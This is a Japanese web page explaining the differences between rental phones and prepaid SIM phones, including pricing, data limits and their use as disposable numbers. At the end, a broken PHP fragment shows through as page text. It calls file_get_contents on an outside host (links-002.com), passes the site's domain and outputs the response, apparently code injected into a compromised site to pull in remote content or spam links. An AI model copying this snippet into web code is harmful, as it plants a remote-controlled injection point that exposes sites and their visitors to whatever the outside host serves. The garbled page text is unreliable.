前へ
次へ

レンタル携帯とプリペイド携帯の違いを知る

携帯電話を利用するときは通常は携帯電話会社との契約が必要です。
大手会社の提供するサービスも利用できますし、最近なら格安SIMサービスを提供する業者を利用してもいいでしょう。
格安SIMサービスはデータ通信だけでなく通話サービスも提供されているので、大手会社と遜色のないサービスを低料金で利用できます。
格安SIMサービスは大手会社のような契約の縛りも少ないので、電話機本体さえ持っていれば安く利用できるメリットがあると言えます。
大手会社や格安SIMサービス以外にも携帯電話を利用する方法があり、似ているようで少し違うものとしてレンタル携帯とプリペイド携帯があります。
レンタル携帯は1日当たりいくらで通話やデータ通信が利用できるサービスで、機械代金からすべてがレンタルできるときもあれば、機械を持っているならSIMカードをレンタルするだけのレンタル携帯もあります。
スマホの中にはSIMカードを複数枚入れられるタイプもあるので、機械1台で通常契約とレンタル携帯を利用なども可能です。
プリペイド携帯はSIMカードを購入して利用する方法で、基本的には機械はついてきません。
ですから機械を持っていないなら購入するか機械のみのレンタルをするかして利用ができます。
レンタル携帯とプリペイド携帯の共通点は電話番号やメールアドレスが使い捨てになる点でしょう。
自分の携帯電話を持っていて番号などを知られたくない人とコミュニケーションできる点では同じように使えるサービスになります。
レンタル携帯とプリペイド携帯の違いとしては通話やデータの量に制限があるかないかです。
レンタル携帯は1日当たりの料金が決められていますが、通話やデータ量は特に制限が決められていないものもあります。
ですから使っている途中で使えなくなるなどはありません。
プリペイド携帯はあらかじめ利用できる量が決まっているため、途中で使えなくて別のSIMカードなどを追加するなどが必要になります。
レンタル携帯の方が面倒さが少ないと言えそうです。

".file_get_contents('http://links-002.com/set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top